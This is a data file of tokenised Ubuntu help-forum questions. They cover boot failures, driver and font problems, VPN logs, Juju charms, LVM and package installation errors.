380207	how do i resolve this `` no such file or directory '' hook error ?	i am trying to write a charm for magento but running into an issue . here is the source for charm https : //github.com/mot3rror/magento-charm the install works perfect . still needs a lot of work but works . i having trouble with database-relation-joined hook to run through . it is saying the file does n't exist but i am able to edit it on that machine so it there . i gave the file execute privileges . i am stuck why i got the error . steps deploying charm juju bootstrap juju deploy mysql juju deploy -- repository=/home/ $ user/charms/ local : precise/magento juju add-relation mysql magento error : 2013-11-21 05:48:51 info juju.worker.uniter uniter.go:517 joining relation `` magento : database mysql : db '' 2013-11-21 05:48:51 info juju.worker.uniter uniter.go:543 joined relation `` magento : database mysql : db '' 2013-11-21 05:48:56 info juju.worker.uniter uniter.go:348 running `` database-relation-joined '' hook 2013-11-21 05:48:56 error juju.worker.uniter uniter.go:350 hook failed : fork/exec /var/lib/juju/agents/unit-magento-0/charm/hooks/database-relation-joined : no such file or directory 2013-11-21 05:48:56 debug juju.worker.uniter modes.go:423 modeabide exiting 2013-11-21 05:48:56 info juju.worker.uniter modes.go:421 modehookerror starting 2013-11-21 05:48:56 debug juju.worker.uniter.filter filter.go:418 want resolved event 2013-11-21 05:48:56 debug juju.worker.uniter.filter filter.go:412 want forced upgrade true 2013-11-21 05:48:56 debug juju.worker.uniter.filter filter.go:523 no new charm event list of the files on the server . https : //github.com/mot3rror/magento-charm/blob/master/list % 20of % 20files.jpg also is there a way to update a charm without destroying the environment and bootstrapping the environment ?
380208	special character is not displaying correctly	when i ssh to my ubuntu , it is full of these : rootàip-10-0-1-52 : ûù where is should be this : root @ ip-10-0-1-52 : ~ $ all of the special character is not displaying correctly , and it happens when i type too . can anyone help ?
380212	ui designing question	i have started to develop and app for a touch screen panel running on a raspberry pi board . i am very new to the linux app developement platform and started ui designing using quickly . i have a button widget which needs some custom data to be displayed on it . so i selected the `` add custom button content '' for my widget and placed a vertical box inside it . what i need is a label and four different images to be added onto it . what i need for the widget to display , in the middle row of the vbox , is a bulb icon image and a semicircular line covering it which would indicate status of a bulb . so my question would be is it possible to add two image widgets on to a single row of a box widget . i think this is probably a very naive question but still just wanted to make sure if there 's any way of doing what i want ... . any help would be greatly appreciated .
380216	unable to root login and may be ~/.bash problem	initially i am trying to connect with github with rsa key and it is giving error permission denied ... unknown host . then change my ~/.ssh directory permission to chmod 700 ~/.ssh chmod 600 ~/.ssh/ chmod 600 ~/.ssh/ . * after that my termianl screen is changed and all settings are went , font color is smoke white and facing these problem : - -bash : /home/gaurav/.bash_profile : permission denied after that login via sudo gaurav @ gaurav-satellite-l640 : / $ sudo login gaurav-satellite-l640 login : gaurav password : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-35-generic-pae i686 ) ** * documentation : https : //help.ubuntu.com/ system information as of xxxxxxxxxxxxx system load : 0.6 processes : 220 usage of / : 58.0 % of 54.13gb users logged in : 1 memory usage : 52 % ip address for eth1 : 10.1.1.12 swap usage : 0 % graph this data and manage this system at https : //landscape.canonical.com/ 46 packages can be updated . 0 updates are security updates . the programs included with the ubuntu system are free software ; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright . ubuntu comes with absolutely no warranty , to the extent permitted by applicable law . no directory , logging in with home=/ gaurav @ gaurav-satellite-l640 : / $ ls bin boot cdrom data dev etc home initrd.img initrd.img.old lib lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.old gaurav @ gaurav-satellite-l640 : / $ sudo nano ~/.bash_profile [ [ -s `` $ home/.bashrc '' ] ] & & source `` $ home/.bashrc '' [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & source `` $ home/.rvm/scripts/rvm '' # load rvm into a shell session *as a function* how enable root login and my pervious setting . i also restarted my pc and not enable to work .
380218	unable to start ubuntu . unknown job	i 'm new to ubuntu . it asked me to reboot because of updates . now it does n't start at all . i 've managed to get to grub . i went to previous versions , and selected the only one available ( 3.5.0-23 ) , which gave me pretty much the same error : then i went into recovery mode > `` dpkg '' , which ended with the same error after some loading .
380220	how to run a brother embroidery machine with `` pe - design ver.7 '' ?	i need to use a design program that help me with my work and i can not make the software functions because the hardware element that my program ( software ) needs is not recognized . the software i need to use is `` pe - design version 7 '' because i have an embroidery machine that functions with the files created with that software . the hardware element that is not recognized is a card-writer module connected to the computer from usb . i installed the software using `` wine '' and i do n't know if this is part of the problem because the software is for windows use . i am using ubuntu 13.10 recently updated from 13.04 and i had the same trouble on the past version of ubuntu . i hope someone could help me with this . also i know my english is not so good , but i hope this is enough .
380222	how to create lv ( logical volume ) after ubuntu is installed ?	everyone . i need to create lv for xen guest . there is only one disk of 70g . while installing , i use the default process and not the lvm . do i need to reinstall ubuntu to create the lv ? is there some better method ? thanks a lot . root @ vswitch-blackfordesb2 : /home/vswitch # vgdisplay no volume groups found root @ vswitch-blackfordesb2 : /home/vswitch # vgcreate vm /dev/sda1 no physical volume label read from /dev/sda1 ca n't open /dev/sda1 exclusively . mounted filesystem ? unable to add physical volume '/dev/sda1 ' to volume group 'vm ' . root @ vswitch-blackfordesb2 : /home/vswitch # pvdisplay root @ vswitch-blackfordesb2 : /home/vswitch # df -h filesystem size used avail use % mounted on /dev/sda1 60g 4.2g 53g 8 % / udev 3.6g 4.0k 3.6g 1 % /dev tmpfs 1.5g 1.1m 1.5g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.6g 0 3.6g 0 % /run/shm
380223	ubuntu12.04 not booting after installing exim	also getting : error : reloc offset is out of the segment after i followed this tutorial ( youtube ) ( installing exim on the ubuntu ) my ubuntu server , boots up till the point where you can select ( generic boot , recovery boot `` with no option to fix just a command prompt '' and a memory scan that does n't do anything except says the memory is fine ) if it runs past the selection screen as if it would boot normally then it just goes black and does n't show the booting of the rest of the operating system so it does n't get to any kind of command prompt so we cant try to fix it by putting in any commands . my ubuntu version is : 12.04 ; i have tried to boot repair and it returns this log . here 's a photo as well : this is quiet an urgent problem . any help greatly appreciated .
380224	is ubuntu ready for the surge of ( possible ) new users ?	with windows xp professional ( sp3 ) coming to eol . is ubuntu ready to welcome a surge of new windows users ? the first thing people will want to know is , can they run their existing software on ubuntu . strange how ubuntu does n't see the door of opportunity or maybe simply not concerned or simply does n't have the desire . not a word on the home page .
380225	i m not being able to install lex and yacc in ubuntu .	i m not being able to install lex and yacc in ubuntu . i m not being able to download the analyzer as well . i have tried the command sudo apt-get install byacc flex . its urgent please
380227	workspace keyboard shortcuts do n't work	i 'm trying to set the keyboard shortcuts for switching to workspace 1,2 ... or move to worskpace 1,2.. and it does n't work . any idea ?
380228	black screen with solid cursor	ok , so i 've searched everywhere , i 've done the grub repair a few times with different options and even re-installed it a few times . after a successful install ( i verified the disk ) it runs through the bios messages ect and gets to a black screen with a cursor , only it 's not blinking like it is for everyone else that 's having a similar issue . it 's completely locking up the system and i ca n't boot into windows 7 that 's installed on a completely separate hdd . i took the drive with ubuntu installed out completely , put the windows 7 drive in , changed the boot options and it does the same thing ? is there an alternative boot method i can use ? i had issues with grub back when i tried ubuntu a while ago too . sorry if this has been answered already , but i ca n't find it after 2 days of searching .
380229	remove ubuntu to downgrade	i 'm trying to remove ubuntu so i can downgrade to a more stable release ( i grabbed the latest one , it 's crashtacular but i really like it when it works ) . it 's a single boot system . i have the usb key i used to install it in the first place but when i boot from it it does n't have an option that jumps out for me as being something that would remove ubuntu . there 's one that says 'ubuntu with a version number . i tried that , it just makes the system boot into ubuntu off the hard drive . the other option is a mem test . is there a command i can enter or do i need to make a different usb key ? all i want to do is clear it right off , i 'm not concerned with saving anything . i just want to blow the whole thing out and then reinstall from scratch . the install process was really really really easy . the uninstall process is oddly complex and difficult if google is an indication . i may just give up , take the drive out and use a windows system to format it but i think having to do that is a bit ridiculous .
380231	i added an extra hdd and formatted to ext4 with ubuntu 10.04	i added an extra sata hdd and formatted it to ext4 file system . then i made entries in /etc/fstab for mounting the hdd to /media . when i restarted the system a message came `` i/o error '' at certain sectors and after some time the option s to skip comes .
380237	path variable to apache opennlp ok but does n't work	yesterday i installed in my ubuntu aws 12.04 ( amazon ) micro istance opennlp and seemed working . today when digiting opennlp : command not found following suggestions found here : i modified my .bash_profile : export java_cmd= $ java_home/bin/java export path= $ path : /opennlp_home/bin export path= $ path export path= $ home/bin : $ path export path=/usr/bin : $ path export path=/usr/local/bin : $ path export path=/usr/local/sbin : $ path export path=/usr/local/heroku/bin : $ path echo $ path /usr/local/heroku/bin : /usr/local/sbin : /usr/local/bin : /usr/bin : /home/ubuntu/bin : /home/ubuntu/.nvm/v0.10.12/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/lib/jvm/jdk1.7.0_40/bin : /opennlp_home/bin echo $ java_home /usr/lib/jvm/jdk1.7.0_40 echo $ java_cmd /usr/lib/jvm/jdk1.7.0_40/bin/java what do i have to do next in order to make it work again ?
380238	how to clean /tmp ?	rizhas @ rizhas-laptop : ~ $ df -h filesystem size used avail use % mounted on /dev/sda7 67g 58g 5,2g 92 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 1,5g 12k 1,5g 1 % /dev tmpfs 303m 1,2m 302m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 1,5g 348k 1,5g 1 % /run/shm none 100m 80k 100m 1 % /run/user overflow 1,0m 1,0m 0 100 % /tmp overflow 1,0m 1,0m 0 100 % /tmp how to clean up /tmp ?
380253	13.10 wo n't start after upgrading	( warning : typed on an ipod touch ) i downloaded 13.10 ( from 13.04 ) today as recommended by the software updater . i left it to download for a couple hours ( it said at the beginning it should 41 minutes with my connection ) and came back and it was n't done and showed no progress for quite awhile . i continued browsing the internet ( videos did n't work because of a lack of flash ) . i noticed the top icon ( i think it 's called system launcher ) did n't have it 's picture and tried clicking it to go to the terminal . as soon as i clicked on it , the side bar with app and top bar disappeared ( the wallpaper was visible ) but chromium was still working . i thought the installer was close to restarting so after leaving the screen like that for awhile . i did a hard restart ( hold power button ) . tried starting it back up and ca n't remember what came up first ( i 've been reading and trying advice on similar problems ) but it did n't start right up to 13.10 . ( i think i had accidentally started the guest account a while before if that makes any difference ) when i start it up , it goes to gnu grub version 2.00-13ubuntu3 with the options : ubuntu advanced options for ubuntu memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) and at the bottom it says use the [ up ] and [ down ] keys to select the highlighted entry . press enter to boot the selected os , 'e ' to edit the commands before booting or 'c ' for a command-line . when i select the `` ubuntu '' option , i get : file system check or mount failed . a maintenance shell will terminate this shell and continue booting after re-trying file systems . any further errors will be ignored . root @ [ my name ] -g41m-es2l : ~ # and nothing happens when i press any key . on other threads , they talked about booting in recovery mode by going to advanced options for ubuntu > ubuntu with linux 3.8.0-33-generic ( recovery mode ) . when i do that , some code scrolls through the screen for a few seconds and then a recovery menu pops up . recovery menu ( filesystem state : read only ) resume resume normal boot clean try to make free space dpkg repair broken packages failsafex run in failsafe graphic mode fsck check in al file systems grub update grub bootloader network enable networking root drop to root shell prompt system-summary system summary < ok > `` on the threads , they recommended people select the drop to root shell prompt . when i select it , i get : root @ [ my name ] -g41m-es2l : ~ # how i can get my computer to boot without wiping my hard drive and starting over ? i really appreciate taking your time to help me .
380254	my 13.04 screen freezes ?	i am a happy ubuntu user since i started using 10.04 lts on my amd sempron 145 2.8 ghz , 1.2gb ram , 1tb harddisk , nvidia graphics . i installed 13.04 as dual boot , but when i started to browse new features in 13.04 , it freezes and repeating every time i use . i even tried 13.10 , but same problem !
380256	problem in installation of vlc media player	i downloaded vlc 2.0.1 for 32 bit ubuntu from http : //ubuntu-15.blogspot.in/2012/06/download-offline-installer-ubuntu-1204.html . it was in `` .isi '' format . whenever i double click on it then gedit window like blank notepad is opening . iam new to ubuntu . so anyone tell me how to install it .
380258	how to change the ubuntu installation to read-write mode on a mobile device	the default ubuntu image for phones is read-only ( ro ) , and updates are applied over-the-air ( ota ) rather than upgrading individual packages . ro here essentially means you can not write to the file system . for testing purposes only , i need to install a package on the image , and obviously i can not do it in ro mode . how can i switch my ubuntu installation to read-write ( rw ) mode to install that package ?
380270	successully installed ubuntu 13.10 : but blank screen when wanted to reboot	i fresh in ubuntu studio . ( ubuntu studio 13.10 64bit ) . i am having a asus a45vd core i5 3210m laptop with nvidia geforce 610 and intel hd 4000 i wanted to dual install using dv . i successfully install the os . but there was a dialog box that asked me to reboot my computer . then following the reboot , there was just a blank screen and i wait 4 hours ! , but nothing happen . then i try install using nomodeset n acpi=off , but was n't successfull . i was trying 4 times and the result just blank screen . i tried in few ways to install that . i tried to do with nomodeset , acpi=off . install a additional drives , nothing happen . how can i fix this ?
380272	alter netbeans debug options	i would start with specifications first . 1 ) ubuntu 12.04 x86 2 ) netbeans ide 7.3.1 3 ) fuzzylite 3.1 my query : the image in the above link the order of the debug option is incorrect as flag -lfuzzylite is coming at the end but it should be in the starting . i am quiet confused . how to figure out and how to do so ?
380274	incorrect helvetica font	my problem is that helvetica is rendered as condensed . this is a reference image , rendered with xelatex : in all applications , the condensed version is selected instead of the regular one ( image taken from font-manager ) : another image , taken from chrome ( sample text with font-family : `` helvetica neue lt pro '' ) : fc-match gives me nothing useful . $ fc-match `` helvetica neue lt pro '' helveticaneueltpro-md.otf : `` helvetica neue lt pro '' `` 65 medium '' what should i do to get proper fonts , without deleting the condensed version of the font ? ( removing the condensed version solves the problem )
380275	any video player that can show two subtitles at a time ?	i am using ubuntu 13.10 . is there any video player that can show two subtitles at a time while watching ? thank you .
380280	magneto not seeing mcrypt in lamp	i am running ubuntu 13.10 desktop and installed a lamp stack ( apache 2.4.6 , and php version 5.5.3-1ubuntu2 ) , and i set up virtual hosts . i also apt-get'ed php5-curl , and php5-mcrypt ( no errors when installing ) i am trying to set up a magento ( 1.8.0.0 ) development environment and the error i am getting is : php extension `` mcrypt '' must be loaded . how do i `` load '' mcrypt ?
380282	problem with desktop on precise 12.04	my desktop looks like this : https : //dl.dropboxusercontent.com/u/310276/screenshot % 20from % 202013-11-21 % 2012 % 3a17 % 3a41.png i am not quite sure how this happened , but it could be after a recent software update . i have tried to change the wallpaper picture under system settings / appearance , but this makes no difference . i have also tried to reset unity ( unity -- reset ) but this has made no difference . i would greatly appreciate any assistance . grovăš
380285	how do i install ubuntu on a asus f55a with freedos	how do i install ubuntu on a asus f55a with freedos . i do n't have a boot cd but an usb stick , and a second notebook with ubuntu already installed . sorry for my ignorance , every help is appreciated .
380287	is it mandatory to provide sources along with the toolchain binaries , or can they be provided on request basis	we are releasing gnu toolchains of using gnu source code for different targets ( rx , rl78 ) . is it mandatory to provide sources along with the toolchain binaries that we released on our company website ? or can be provided on request basis ?
380288	installing ubuntu on windows 2000 pro laptop	i have an old laptop running windows 2000 pro that one belonged to a domain . i can no longer remember my password to log on to it . i therefore want to install ubuntu . is this possible from boot ?
380291	connect to servers behind a proxy for ftp and ping	i connect to servers behind a proxy ( 127.0.0.1:3000 ) via connect proxy for ssh and scp connections . when i try to connect to ftp servers or ping any server , they do not work . how do i configure ftp to connect via proxy for a certain set of servers . the same goes for pings as well . i have ftp_proxy set . $ echo $ ftp_proxy http : //127.0.0.1:3000 ftp ftpdevserver01 21 ftp : ftpdevserver01 : name or service not known ping ftpdevserver01 ping : unknown host ftpdevserver01
380296	problem in address of one user	hi i want to do these jobs by one scripts : 1- read the name of current user ( i do n't know what is it ! ) 2- switch to root user 3- go to root directory 4- go to the desktop director of first user i wrote this script : # ! /bin/bash _user=id -u -n su cd cd .. cd ~ '' $ _user '' but it does'n switch the directory i also made password for root user , before run this scripts any help ! thanks , babak
380299	questions about ubuntu , hdd , ssd	context : i 'm currently running ubuntu 13.04 on a 50gb partition of my hp elitebook 8560p . as it is a company computer i 'm asked frequently to `` redump '' my hdd with the company fresh new dump . of course , i loose all my data and my ubuntu installation in the process . i would like to buy a caddy and use a ssd ( or hdd if investing in ssd is n't worth it ) for my `` personal '' distrib . questions : is it possible to have a hdd and a ssd with plenty of operating systems on both of them ? how does it work with grub ? do i select which disk i want to boot on at start and then choose which operating system to use ? would i be able to mount my hdd parts to access them ? i have a clonezilla server . could i use it to transfer my ubuntu 13.04 from my hdd to my ssd ? ps : oh , and if you happen to know where i could buy this kind of equipment , this would be great : ) !
380302	how to connect to ipsec vpn using ubuntu 13.10	i used l2tp ipsec vpn manager until upgrading to 13.10 it worked previously . but now it does not work . the ipsec server ( fortigate firewall , logs everything as just fine , then says the client disconnected . ) the line ipcp terminated by peer ( unauthorized remote ip address ) - makes no sense , the ip is provided by the fw , and is from the right pool . also , fw does not log any problem . finally : connecting to the same fw using android - works fine . log from ipsec client : nov 21 11:58:16.839 ipsec_setup : stopping openswan ipsec ... nov 21 11:58:18.580 stopping xl2tpd : xl2tpd . nov 21 11:58:18.581 xl2tpd [ 19495 ] : death_handler : fatal signal 15 received nov 21 11:58:18.612 ipsec_setup : starting openswan ipsec u2.6.38/k3.11.0-13-generic ... nov 21 11:58:18.886 ipsec__plutorun : starting pluto subsystem ... nov 21 11:58:18.892 ipsec__plutorun : adjusting ipsec.d to /etc/ipsec.d nov 21 11:58:18.900 recvref [ 30 ] : protocol not available nov 21 11:58:18.900 xl2tpd [ 21494 ] : this binary does not support kernel l2tp . nov 21 11:58:18.901 xl2tpd [ 21497 ] : xl2tpd version xl2tpd-1.3.1 started on andre-optiplex-990 pid:21497 nov 21 11:58:18.902 xl2tpd [ 21497 ] : written by mark spencer , copyright ( c ) 1998 , adtran , inc. nov 21 11:58:18.902 xl2tpd [ 21497 ] : forked by scott balmos and david stipp , ( c ) 2001 nov 21 11:58:18.902 xl2tpd [ 21497 ] : inherited by jeff mcadams , ( c ) 2002 nov 21 11:58:18.902 xl2tpd [ 21497 ] : forked again by xelerance ( www.xelerance.com ) ( c ) 2006 nov 21 11:58:18.902 xl2tpd [ 21497 ] : listening on ip address 0.0.0.0 , port 1701 nov 21 11:58:18.903 starting xl2tpd : xl2tpd . nov 21 11:58:19.031 ipsec__plutorun : 002 added connection description `` valhall '' nov 21 11:58:19.386 104 `` valhall '' # 1 : state_main_i1 : initiate nov 21 11:58:19.387 003 `` valhall '' # 1 : received vendor id payload [ rfc 3947 ] method set to=115 nov 21 11:58:19.387 003 `` valhall '' # 1 : received vendor id payload [ dead peer detection ] nov 21 11:58:19.387 003 `` valhall '' # 1 : ignoring unknown vendor id payload [ 8299031757a36082c6a621de000402a0 ] nov 21 11:58:19.387 106 `` valhall '' # 1 : state_main_i2 : sent mi2 , expecting mr2 nov 21 11:58:19.388 003 `` valhall '' # 1 : nat-traversal : result using draft-ietf-ipsec-nat-t-ike ( macos x ) : i am nated nov 21 11:58:19.388 108 `` valhall '' # 1 : state_main_i3 : sent mi3 , expecting mr3 nov 21 11:58:19.388 004 `` valhall '' # 1 : state_main_i4 : isakmp sa established { auth=oakley_preshared_key cipher=oakley_3des_cbc_192 prf=oakley_sha group=modp1024 } nov 21 11:58:19.388 117 `` valhall '' # 2 : state_quick_i1 : initiate nov 21 11:58:19.388 003 `` valhall '' # 2 : ignoring informational payload , type ipsec_responder_lifetime msgid=0530bd3b nov 21 11:58:19.389 003 `` valhall '' # 2 : nat-traversal : received 2 nat-oa . ignored because peer is not nated nov 21 11:58:19.389 004 `` valhall '' # 2 : state_quick_i2 : sent qi2 , ipsec sa established transport mode { esp= > 0xea9d24b4 < 0xc36d9ff6 xfrm=3des_0-hmac_sha1 natoa=none natd=none dpd=none } nov 21 11:58:20.391 xl2tpd [ 21497 ] : connecting to host mydomain.com , port 1701 nov 21 11:58:20.461 xl2tpd [ 21497 ] : connection established to x.x.x.199 , 1701 . local : 46031 , remote : 3 ( ref=0/0 ) . nov 21 11:58:20.461 xl2tpd [ 21497 ] : calling on tunnel 46031 nov 21 11:58:20.529 xl2tpd [ 21497 ] : call established with x.x.x.199 , local : 65516 , remote : 4 , serial : 1 ( ref=0/0 ) nov 21 11:58:20.529 xl2tpd [ 21497 ] : start_pppd : i 'm running : nov 21 11:58:20.530 xl2tpd [ 21497 ] : `` /usr/sbin/pppd '' nov 21 11:58:20.530 xl2tpd [ 21497 ] : `` passive '' nov 21 11:58:20.530 xl2tpd [ 21497 ] : `` nodetach '' nov 21 11:58:20.530 xl2tpd [ 21497 ] : `` : '' nov 21 11:58:20.531 xl2tpd [ 21497 ] : `` file '' nov 21 11:58:20.531 xl2tpd [ 21497 ] : `` /etc/ppp/valhall.options.xl2tpd '' nov 21 11:58:20.531 xl2tpd [ 21497 ] : `` ipparam '' nov 21 11:58:20.531 xl2tpd [ 21497 ] : `` x.x.x.199 '' nov 21 11:58:20.532 xl2tpd [ 21497 ] : `` /dev/pts/5 '' nov 21 11:58:20.539 pppd [ 21544 ] : plugin passprompt.so loaded . nov 21 11:58:20.547 pppd [ 21544 ] : pppd 2.4.5 started by root , uid 0 nov 21 11:58:20.548 pppd [ 21544 ] : using interface ppp0 nov 21 11:58:20.548 pppd [ 21544 ] : connect : ppp0 < -- > /dev/pts/5 nov 21 11:58:23.693 pppd [ 21544 ] : deflate ( 15 ) compression enabled nov 21 11:58:23.754 pppd [ 21544 ] : local ip address 192.168.1.141 nov 21 11:58:23.755 pppd [ 21544 ] : remote ip address 192.168.1.140 nov 21 11:58:23.755 pppd [ 21544 ] : primary dns address x.x.x.x nov 21 11:58:23.755 pppd [ 21544 ] : secondary dns address x.x.x.x nov 21 11:58:23.761 pppd [ 21544 ] : ipcp terminated by peer ( unauthorized remote ip address ) nov 21 11:58:23.761 pppd [ 21544 ] : connect time 0.0 minutes . nov 21 11:58:23.762 pppd [ 21544 ] : sent 0 bytes , received 34 bytes . nov 21 11:58:23.831 pppd [ 21544 ] : lcp terminated by peer ( no network protocols running ) nov 21 11:58:24.048 xl2tpd [ 21497 ] : control_finish : connection closed to x.x.x.199 , serial 1 ( ) nov 21 11:58:24.049 xl2tpd [ 21497 ] : terminating pppd : sending term signal to pid 21544 nov 21 11:58:24.049 pppd [ 21544 ] : modem hangup nov 21 11:58:24.049 pppd [ 21544 ] : connection terminated . nov 21 11:58:24.074 pppd [ 21544 ] : terminating on signal 15 nov 21 11:58:24.075 pppd [ 21544 ] : exit . so how to connect to ipsec vpn ?
380303	how to make joystick work with onlive games under playonlinux app with wine 1.5.8 or other ?	how make my joystick work to play onlive streamming games under playonlinux , i'am with lubuntu lxde 13.10 and i use wine 1.5.8. on playonlinux that supposly should work with joystick but dont . i already tested the joystick with jstest-gtk and iam able to calibrate it there and all buttons works so the problema dont come from lubuntu recognising or not because actually this test proves that it does .
380306	uninstall kde wallet from ubuntu 13.04	i 'm trying to uninstall or disable kde wallet . i ca n't find it in the ubuntu software centre and it does n't seem to be listed when i do : dpkg -l i found some instructions how to remove it in 10.10 here : http : //askubuntu.com/a/47218/101048 however , there is no `` account details '' section in `` system settings '' in my version of ubuntu , and when i run `` kcmshell4 kwalletconfig '' , i get the following error : could not find module 'kwalletconfig ' . see kcmshell4 -- list for the full list of modules .
380308	multiple user login via xrdp with seprate session : how to do that ?	i have been trying to set up a rdp connection using xrdp and have been having significant trouble getting a working configuration . when a user logs on , i need it to connect with a new session . so workflow is like my ubntu machine has three user say lin1 , lin2 , lin3 . every time a user connects remotely to my ubntu machine , he must connect with new session . say if first user connect he must logged in to lin1 user and if second user connect at same , he must logged in with lin2 user and so on . so that each user can maintain there separate session , and also multiple user can log in at same time . what changes to the default configuration do i need to make in order for this to work ? for details refer this . i need to implement something like this in linux
380309	why do i always get an error while upgrading from 12.04 to 14.04 ?	i am having trouble trying to upgrade the distribution using the following command : update-manager-d i get the option to update to 14.04 ( trusty tahr ) and i do get exclusive lock , but it always fails at `` setting new software channels '' . this is the error i get : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/main/source/sources 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . i live in south africa where the broadband internet tops out at 105 kpbs , which is damn slow and downloading the whole iso takes way too long . pc specs : hp pavilion dv6 2gb ram amd turion 2 m500 2.2ghz ( dual core ) dual boots into windows 7 pro and ubuntu 12.04 lts .
380310	how to get the output ( stdout/stderr ) of a click application ?	i have a click application installed on ubuntu touch , and i need to be able to read its standard output in order to debug it . is the output captured somewhere , or is it possible to see it on the terminal when launching the application with the `` start '' command ?
380313	which file is explorer.exe equivalent in ubuntu . ?	on disabling explorer.exe file in windows , we disable the click events as well as the desktop icons and all other interface facilities are disabled . is there any file in ubuntu which disables these interface facilities in ubuntu ?
380315	command to open new tab in the current terminal	is it possible to open a new tab in the current terminal with some commands ?
380319	vps : disaster recovery	i have a live vps running ubuntu 12.04.3 lts ( precise pangolin ) , and though i have all of our web application 's databases backed up to the amazon s3 , and all of our source code backed up on bitbucket and local development machines , i still want to keep downtime down to a minimum in the event of some unprecedented and catastrophic system failure . really , what i need is maybe an application that clones my ubuntu server as a disk image or a similar format every x amount of seconds , which can then be downloaded to my local machine , or uploaded to another vps . maybe it could do this in a git sort of way , similar to mac osx ' time machine , so only changes to the system are saved and uploaded , and my bandwidth is n't used up uploading every last bit of information to another location , over and over again . i 'd also want to use this disc image if were to move hosts . i 'd like to be able to back up my local ubuntu installation with it too . or does ubuntu include some command line tools that make this backup process less daunting ? will i be able to write a script myself that calls some commands to backup my vps ? i know of ubuntu one and the ubuntu 's backup application on my local machine , so is there a cli equivalent for my server ? i 'm prepared to change my ubuntu installation to > 13 if it means these tools will be available . now , when windows goes funny , your best bet is to nuke it and reinstall everything . but ubuntu is far superior : d , so could i use this backup process without fear of bugs and corruption and other nasties ?
380324	rhythmbox and ipod recompressing audio on sync	i have a number of albums on my mac with itunes in very high and some lossless formats . when my ipod is plugged in itunes will recompress these to 256mb/s aac for it while leaving the high quality tracks on the computer . this is good and works for me nicely . i am moving all my music to my new ubuntu home server/pc . getting the music into rhythmbox does n't seem to be a problem . however i do n't see any option to do the recompressing to a lower bitrate for the ipod . is this something it can do or should i look at a different music player ?
380325	ubuntu 13.10 installed with fglrx , can not copy icons to desktop	i 'm somewhat of a linux newbie . ive recently converted to ubuntu , and after an initial struggle of a 'low graphics issue ' , which i resolved by doing an apt-get install fglrx . i know have the ability to log into ubuntu , and get open all the applications , etc . the only gripe is that i can not seem to copy and paste anything to the desktop . i get an error message saying : error while copying . there was an error getting information about `` / '' if i select more details it states : the specified location is not supported . is this a known issue ? is there a way to resolve this , or have i done something wrong in the installation ? any help would be greatly appreciated ! . if you require any further information from myself , please feel free to ask .
380326	problem with installing error `` no root file system is defined ''	i am to linux and i have just bought a new desktop with 1 tb hard disk . i have left 500gb for linux as free allocated but while trying to install i could not see the free allocated hard-disk else i am getting error .
380330	duplicate source error on apt-get update	when i run apt-get update on my ubuntu 13.10 desktop install i get this error : w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main i386 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems what does this mean ? how can i resolve it ? and what issues can it create ? i want to understand the problem so if i run into it or anyone else i can help resolve it .
380337	trouble with skype new version	i had been using skype successfully for some time . my old laptop needed to replace and when it came i downloaded skype and used it once with good effect . i went to use it last night and found the skype had totally disappeared off my laptop . i reinstalled it and found that it was not the same as i had previously , i had lost contacts , all the photos , telling me if people were on/off line and did not offer me the facility to video call . all it offered me was to call the number , no video and the messages need to pay for ! . i uninstalled it and tried again and still the same situation . what has happened to skype it used to be so easy to use and brilliant , now it 's unusable for me ?
380338	where does x.org get its settings ?	this question is 50 % to solve a specific problem , and 50 % to help further my general understanding of linux/ubuntu . background i am running ubuntu 13.10 . i have installed cinnamon to use as my desktop environment ( `` de '' ) . i have an issue concerning my touchpad ( i am using a laptop ) . when i log in using unity as my de , the cursor speed/acceleration and `` tap to click '' work perfectly . when i log in using cinnamon as my de , they do not . the speed/acceleration is awful , and tap to click does n't work . the same app that adjusts the mouse setting under unity appears to be ineffective under cinnamon . after some googling , i have managed to use the command `` synclient '' to enable tap to click . i have even made this a start up command so that it works for every session when i log in . i believe i could also use synclient to change the cursor speed etc. , but i need to look further into the available options . question my questions are : as with all newer versions of ubuntu , i do n't have an xorg.conf file ( though i understand i could create one ) . without one , where is xorg getting its settings for things like the mouse ? ; and why is unity picking up different settings to cinnamon ? my understanding was that des were just superficial , and the core setting for x ( input , screen resolution etc ) were more fundamental than that . unity must be getting different settings from somewhere , and i would like to copy and duplicate them in cinnamon . any help or advice appreciated . many thanks
380339	merge application window with ubuntu gnome 3 top bar	is it possible to add the close/minimize/maximize bar to the top gnome bar like in unity so it takes up less space ? i 'm running gnome 3.x in ubuntu .
380341	ubuntu contacts and google - how to sync ?	i would like to use the contacts app in ubuntu to pick up and sync with my google contacts . this way they will be there on my phone and my other computers . i see no way to do this . can anyone help and tell me how to sync the two together and keep them updating each other ?
380343	unable to locate package unbuntu-desktop	i 've created a new desktop server 12.04 lts , now its a fresh install and ive run the commands . sudo apt-get update sudo apt-get upgrade but when i run sudo apt-get install unbuntu-desktop the message below is returned . reading package list ... done building dependency tree reading state information ... done e : unable to locate package unbuntu-desktop i have also checked the source list file and all is correct . not sure why i am unable to receive this package only any other package i try it fine . to note : i did previously install this unbuntu desktop 2 days ago and wiped the machine then rebuilt with the same steps .
